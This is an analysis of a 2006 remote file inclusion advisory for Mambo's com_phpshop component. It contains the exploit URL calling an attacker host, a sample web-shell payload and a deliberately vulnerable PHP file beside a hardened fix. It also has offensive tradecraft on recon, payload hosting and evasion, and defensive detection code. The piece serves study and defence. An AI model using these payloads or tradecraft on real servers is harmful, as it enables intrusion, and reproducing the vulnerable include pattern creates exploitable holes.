Understanding Mambo Component 'com_phpshop' Remote File Inclusion

What this paper is
This page analyses Exploit-DB paper 2206 (first published on milw0rm on 17 August 2006), which reports a Remote File Inclusion (RFI) vulnerability in version 1.2 RC2b of the phpShop component for the Mambo CMS (com_phpshop). An unauthenticated attacker who can reach one file of the component over HTTP can make the server fetch a PHP file from a host of the attacker's choosing and execute it, which amounts to remote code execution as the web server user.
Simple technical breakdown
The vulnerable file is administrator/components/com_phpshop/toolbar.phpshop.html.php. Inside the Mambo framework, $mosConfig_absolute_path is a global that configuration.php defines and that component files use to build filesystem paths when they are loaded through index.php. The toolbar file uses that global as the prefix of a path it includes, but it can be requested directly over HTTP, in which case nothing in Mambo has defined the variable. On a PHP installation running with register_globals=On (off by default since PHP 4.2.0, but still widespread on shared hosting in 2006), a query parameter named mosConfig_absolute_path becomes the PHP variable of the same name, so the attacker controls the prefix of the include path. PHP's include/require accept URLs when allow_url_fopen is enabled (and, from PHP 5.2.0 onward, when allow_url_include is enabled as well), so pointing the prefix at an attacker-controlled web server makes the application fetch the remote file and execute whatever PHP it contains. That is a textbook Remote File Inclusion.
Complete code and payload walkthrough
The advisory's exploit is a single HTTP request rather than a program: the URL below is enough to trigger the inclusion. Everything the attacker wants executed lives in the remote file that the URL names.
Exploit URL:http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt
Let's break down the components of this URL:
- http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php: the target, i.e. the vulnerable file inside the Mambo installation.
  - www.targer.com: the vulnerable Mambo site (a placeholder hostname from the advisory).
  - /administrator/components/com_phpshop/toolbar.phpshop.html.php: the vulnerable script. It lives in the back-end (administrator) part of the component and renders the admin toolbar HTML for com_phpshop; it is an include file that was never meant to be requested on its own.
- ?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt: the query string carrying the malicious parameter.
  - mosConfig_absolute_path: the Mambo configuration global that normally holds the filesystem root of the installation. The script uses it as a path prefix without checking that Mambo, rather than the request, set it.
  - http://Senjata.com/tembuspakeshell.txt: the value supplied, a URL to a file on the attacker's server.
  - Senjata.com: the attacker-controlled host serving the payload.
  - /tembuspakeshell.txt: the payload file. The .txt extension is not a filter bypass. It is there so that the attacker's own web server returns the PHP source as plain text instead of executing it; the target's PHP engine interprets whatever bytes the include returns, regardless of the remote file's extension.
How it works:
- The attacker crafts a URL naming the vulnerable script and a remote file that contains PHP source.
- The Mambo host receives the request. The web server hands toolbar.phpshop.html.php straight to PHP, bypassing index.php and the configuration.php that would normally define $mosConfig_absolute_path.
- With register_globals on, the query parameter mosConfig_absolute_path populates the global of the same name.
- Lacking any validation, the script passes the attacker's value to include/require as the path prefix.
- PHP, with URL wrappers enabled for include (allow_url_fopen, plus allow_url_include on PHP 5.2 and later), fetches http://Senjata.com/tembuspakeshell.txt over HTTP.
- The returned bytes are parsed as PHP and executed on the target with the privileges of the web server user.
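To make the mechanism concrete, here is an added illustration written for this page. It is not com_phpshop's source, which the advisory does not reproduce; the file names and the included path (phpshop.toolbar.php) are assumptions. The first file shows the vulnerable style, an include path built from a global the request can define. The second is the same file hardened with the two measures Mambo itself used for files meant only to be included: the _VALID_MOS guard and a path derived from the script's own location.

```php
<?php
// ---------- vulnerable_toolbar.php ----------
// Added illustration of the vulnerable pattern; NOT the real toolbar.phpshop.html.php.
//
// Mambo's index.php loads configuration.php, which defines $mosConfig_absolute_path,
// before including component files. This file silently assumes that happened and
// uses the global as a path prefix.
//
// Requested directly, nothing has defined the variable. With register_globals=On the
// query parameter ?mosConfig_absolute_path=... defines it instead, and because
// include/require accept URLs when allow_url_fopen is On (plus allow_url_include from
// PHP 5.2.0), a value of http://attacker/shell.txt is fetched and executed.
//
// register_globals no longer exists on current PHP. The extract() call below is a lab
// shim that reproduces its effect so the bug can be demonstrated; it is not part of
// the pattern being illustrated.
extract($_GET, EXTR_SKIP);

// Hypothetical include target. The suffix is glued onto whatever the attacker supplied,
// so the attacker's server must answer for the whole resulting URL (attackers often end
// the injected value with '?' so the suffix becomes a query string the remote server
// ignores).
require_once $mosConfig_absolute_path . '/administrator/components/com_phpshop/phpshop.toolbar.php';
?>
<?php
// ---------- hardened_toolbar.php ----------
// Same file with the two fixes (added illustration).

// 1. Refuse direct requests. Mambo's front controller defines _VALID_MOS before
//    including anything; a file fetched straight from the web server never sees it.
//    This is the guard line Mambo used verbatim in files meant only for inclusion.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// 2. Never take the include prefix from a variable a request can populate.
//    __FILE__ is fixed when the script is compiled and cannot be influenced by the
//    client. (dirname(__FILE__) keeps this valid on PHP 4 and 5.2; __DIR__ exists
//    from PHP 5.3.)
$componentDir = dirname(__FILE__);
require_once $componentDir . '/phpshop.toolbar.php';
```

Note that turning off URL wrappers in php.ini only closes the remote variant. In the vulnerable file the prefix can still be steered at local paths, so the fix belongs in the code (guard plus a client-independent path), with php.ini hardening as defence in depth.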
Payload Segment:
The "payload" in this context is the content of the remote file tembuspakeshell.txt. While the paper doesn't explicitly show the content of tembuspakeshell.txt, a typical RFI payload would be a simple PHP script designed to achieve a specific goal, such as:
- Establishing a reverse shell: Connecting back to the attacker's machine.
- Executing arbitrary commands: Allowing the attacker to run commands on the server.
- Creating a web shell: Providing an interactive interface for the attacker to navigate the server and execute commands.
A common example for tembuspakeshell.txt could be:
<?php
// Hypothetical contents of tembuspakeshell.txt: a minimal command shell.
// Once the target includes this file, the code runs inside the target's PHP
// process, so $_GET is the query string of the request that hit
// toolbar.phpshop.html.php. The command is supplied as an extra parameter, e.g.
// ...toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt&cmd=id
echo "<h1>Hacked by Cmaster4</h1>";   // banner confirming that the include executed
system($_GET['cmd']);                 // run the attacker's command with the web server's privileges
?>
In this hypothetical payload:
- <?php ... ?>: PHP opening and closing tags. Anything the remote file contains outside them is echoed to the response as plain text rather than executed.
- echo "<h1>Hacked by Cmaster4</h1>";: a visible marker confirming execution.
- system($_GET['cmd']);: the core of the malicious functionality. It takes a command from the cmd GET parameter of the request and executes it on the server, returning its output in the HTTP response.
Mapping:
- toolbar.phpshop.html.php: the vulnerable script that processes the mosConfig_absolute_path parameter.
- mosConfig_absolute_path: the vulnerable parameter that enables remote file inclusion.
- http://Senjata.com/tembuspakeshell.txt: the attacker-controlled remote file containing the payload.
- Content of tembuspakeshell.txt: the actual malicious code (e.g., PHP commands) that is executed.
Practical details for offensive operations teams
- Required Access Level: none. The request is unauthenticated and goes straight to the component file, so no Mambo account, session or prior foothold is needed; reachability of the administrator/ path over HTTP is the only requirement.
- Lab Preconditions:
  - A Mambo installation with the phpShop component (com_phpshop) 1.2 RC2b installed, so that administrator/components/com_phpshop/toolbar.phpshop.html.php exists and is reachable over HTTP.
  - PHP configured with register_globals=On and URL wrappers enabled for include (allow_url_fopen=On; on PHP 5.2 or later also allow_url_include=On). A period-appropriate PHP 4.x or 5.1 build reproduces the 2006 conditions most faithfully.
  - An attacker-controlled web server (Senjata.com in the example) serving the payload over HTTP as plain text.
  - The payload file (tembuspakeshell.txt) containing valid PHP source.
- Tooling Assumptions:
  - A web browser for manual testing.
  - curl or wget for scripted requests.
  - Optionally, a vulnerability scanner with RFI checks.
  - Any simple HTTP server (python -m http.server, Apache, Nginx) to host the payload; it must serve .txt files as static content.
- Execution Pitfalls:
  - URL wrappers disabled for include: on PHP before 5.2.0, include/require of a URL needs allow_url_fopen=On; from 5.2.0 onward it additionally needs allow_url_include=On, which defaults to Off. With either missing, the include fails and the target logs a warning instead of running the payload.
  - register_globals off: the attack depends on the query parameter becoming $mosConfig_absolute_path. With register_globals=Off (the PHP default since 4.2.0; the directive was removed in 5.4) and no other source for the variable, the prefix is empty and the request fails.
  - Appended suffix: if the script concatenates a path after $mosConfig_absolute_path, the attacker's server receives a request for that whole URL. Common handling is to end the injected value with ? so the suffix lands in the query string, or to serve the payload for any path below a directory.
  - File extension on the attacker's server: the target executes whatever bytes it receives, so the payload should be served as plain text (.txt). Hosting it as .php on the attacker's server would execute it there and hand the target only the output.
  - WAF/IPS: a query parameter whose value is itself a URL is an obvious signature; expect it to be blocked on monitored targets.
  - Incorrect path: the administrator/components/com_phpshop path assumes a default Mambo layout. Confirm the component is present and the path resolves; a 404 is not evidence of a fix.
  - Payload not executable: a syntax error in the remote file aborts the include. Lint the payload locally first (php -l tembuspakeshell.txt).
  - Parameter no longer used: a patched or modified toolbar.phpshop.html.php may refuse direct access or no longer build its include path from this variable.
- Tradecraft Considerations:
  - Reconnaissance: fingerprint Mambo installations and versions; the advisory's own search hint is inurl:"com_phpshop". Confirm that administrator/components/com_phpshop/ exists on the target.
  - Payload Hosting: every include re-fetches the file, so the hosting server must stay reachable from the target for as long as it is used; a domain that does not stand out in the target's outbound logs attracts less attention.
  - Obfuscation: basic signature detection may trigger on the payload body or on the URL-in-parameter pattern of the request; obfuscating the payload addresses only the former.
  - Post-Exploitation: the include gives code execution as the web server user. The usual next step is a more stable interactive shell or a web shell written to disk, after which the remote host is no longer needed.
Where this was used and when
The advisory was published on milw0rm on 17 August 2006 and is archived as Exploit-DB paper 2206. Mambo was a widely deployed CMS at the time, and RFI flaws of exactly this shape (a configuration global overwritten through register_globals and fed into include) were among the most common web application bugs of that era. The paper does not document in-the-wild use of this specific exploit, but RFI in PHP applications was routinely exploited at scale to plant web shells and recruit servers into botnets.
Defensive lessons for modern teams
- Input validation: never build an include path from request-controlled data. Check file names against an allow-list and resolve paths relative to the script's own directory (dirname(__FILE__)), never from a variable the request can set.
- Harden php.ini: set allow_url_include=Off (the directive exists since PHP 5.2.0) so include/require cannot load URLs at all, and set allow_url_fopen=Off unless the application genuinely needs URL-aware file functions. Keep register_globals off; on PHP 5.4 and later the directive no longer exists, which removes this class of variable-poisoning bug outright.
- Block direct access to include files: Mambo's own convention, defined('_VALID_MOS') or die(...), was evidently missing or ineffective in this file. Application-level guards and web server rules that deny direct requests to include-only files both help.
- Keep software updated: patch CMS cores, components and plugins promptly. Joomla! forked from Mambo in 2005 and Mambo development later ceased, so any remaining Mambo installation is running unmaintained code.
- Web Application Firewalls (WAFs): a query-string value that is itself a URL is a high-confidence RFI signature; block and alert on it.
- Least privilege: run PHP as an unprivileged user with no write access to the document root beyond what the application needs, so a successful include cannot easily drop a persistent web shell.
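The two defensive checks a team would most want to automate, as an added example for this page (not part of the original advisory): a php.ini audit for the directives that make include-based RFI possible, and a scan of access-log lines for query-string values that are themselves URLs or PHP stream wrappers, which is the shape of the advisory's request. The sample log lines are constructed for the example in Apache combined format, and that layout is an assumption about the reader's own logs. PHP 7 or later is assumed.

```php
<?php
// rfi_audit.php - added example for this page, not part of the original advisory.
// Two defensive checks in one CLI script (PHP 7 or later):
//   1. auditIni()       reports the php.ini settings that make include-based RFI possible.
//   2. scanAccessLog()  flags access-log lines whose query string carries a URL or a PHP
//                       stream wrapper in a parameter value, the shape of the advisory's request.
// The log lines at the bottom are constructed for this example in Apache combined format;
// that layout is an assumption about the reader's own logs.

/** Return each RFI-relevant ini directive with a verdict string. */
function auditIni(): array
{
    // Directives whose value should be Off. The notes record the history a reviewer
    // needs when reading an old server's php.ini.
    $directives = [
        'allow_url_include', // include/require of URLs; exists since PHP 5.2.0, default Off
        'allow_url_fopen',   // URL-aware file functions; default On, and before 5.2.0 the only gate for include()
        'register_globals',  // request parameters become globals; default Off since 4.2.0, removed in 5.4
    ];
    $report = [];
    foreach ($directives as $name) {
        $value = ini_get($name); // false when this PHP build does not know the directive
        if ($value === false) {
            $report[$name] = 'absent (directive not known to this PHP build)';
        } else {
            $report[$name] = filter_var($value, FILTER_VALIDATE_BOOLEAN) ? 'ON  <-- hardening gap' : 'off';
        }
    }
    return $report;
}

/**
 * True when any query-string value of the request target is an absolute URL or a PHP
 * stream wrapper. parse_str() decodes one layer of percent-encoding; the extra urldecode()
 * catches a second, double-encoded layer.
 */
function isRfiAttempt(string $requestTarget): bool
{
    $pos = strpos($requestTarget, '?');
    if ($pos === false) {
        return false;
    }
    parse_str(substr($requestTarget, $pos + 1), $params);
    $pattern = '#^\s*(?:https?|ftps?|php|data|expect|phar)://#i';
    foreach ($params as $value) {
        if (is_string($value) && preg_match($pattern, urldecode($value))) {
            return true;
        }
    }
    return false;
}

/** Return the combined-format log lines whose request target looks like RFI. */
function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // The quoted request field: "METHOD target HTTP/x.y"
        if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m) && isRfiAttempt($m[1])) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample traffic (not real logs). Lines 2 and 3 mirror the advisory's request;
// the third is percent-encoded and ends the URL with '?' to swallow an appended suffix.
$sampleLog = [
    '203.0.113.7 - - [17/Aug/2006:10:00:01 +0000] "GET /index.php?option=com_phpshop&page=shop.browse HTTP/1.1" 200 5120',
    '203.0.113.7 - - [17/Aug/2006:10:00:02 +0000] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt HTTP/1.1" 200 311',
    '198.51.100.4 - - [17/Aug/2006:10:00:03 +0000] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http%3A%2F%2FSenjata.com%2Ftembuspakeshell.txt%3F HTTP/1.1" 200 311',
    '192.0.2.9 - - [17/Aug/2006:10:00:04 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8801',
];

if (PHP_SAPI === 'cli') {
    echo "php.ini audit:\n";
    foreach (auditIni() as $name => $verdict) {
        printf("  %-18s %s\n", $name, $verdict);
    }
    echo "\nRFI indicators in sample log:\n";
    foreach (scanAccessLog($sampleLog) as $hit) {
        echo "  $hit\n";
    }
}
```

Run it with php rfi_audit.php. On a current PHP the audit reports register_globals as absent and allow_url_include as off, while the scan flags the second and third sample lines and ignores the ordinary Mambo requests; swapping $sampleLog for file('access.log') turns it into a quick triage pass over real logs.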
ASCII visual (if applicable)
+------------------------+
| Attacker client        |
| (browser / curl)       |
+-----------+------------+
            | (1) GET /administrator/components/com_phpshop/toolbar.phpshop.html.php
            |         ?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt
            v
+-----------------------------------------------------------+
| Target Web Server (Mambo + com_phpshop)                   |
|   register_globals=On: $mosConfig_absolute_path is set    |
|   from the query string                                   |
|   toolbar.phpshop.html.php builds its include path from   |
|   that variable and calls include/require on it           |
+-----------+-----------------------------------------------+
            | (2) include() fetches the URL over HTTP
            v                         ^ (3) raw PHP source returned as text
+-----------------------------------+ |
| Attacker Server (Senjata.com)     |-+
|   - tembuspakeshell.txt (payload) |
+-----------------------------------+
            (4) The target parses the returned bytes as PHP and executes them
Source references
- PAPER ID: 2206
- PAPER TITLE: Mambo Component 'com_phpshop' 1.2 RC2b - Remote File Inclusion
- AUTHOR: Cmaster4
- PUBLISHED: 2006-08-17
- KEYWORDS: PHP,webapps
- PAPER URL: https://www.exploit-db.com/papers/2206
- RAW URL: https://www.exploit-db.com/raw/2206
Original Exploit-DB Content (Verbatim)
Affected Application: Mambo phpShop v1.2 RC2b
(Mambo CMS Component)
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discovered/Found by: Charles Nelwan a.k.a Cmaster4
Team: BatamHacker irc.dal.net crew
URL: http://www.batamhacker.info/forum
E-Mail: bugtraq_indo@yahoo.com
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Typ: Remote [x] Local [ ]
Remote File Inclusion [x] SQL Injection [ ]
Level: Low [ ] Middle [x] High [ ]
Application: Mambo phpShop
Version: 1.2 RC2b
Vulnerable File: toolbar.phpshop.html.ph
URL: http://www.mambo-phpshop.net or http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=category&filecatid=1054
Description: phpShop component for Mambo. A fully featured shop component with IPN support, categories, userhandling, etc.
inurl:"com_phpshop"
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt
Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker
# milw0rm.com [2006-08-17]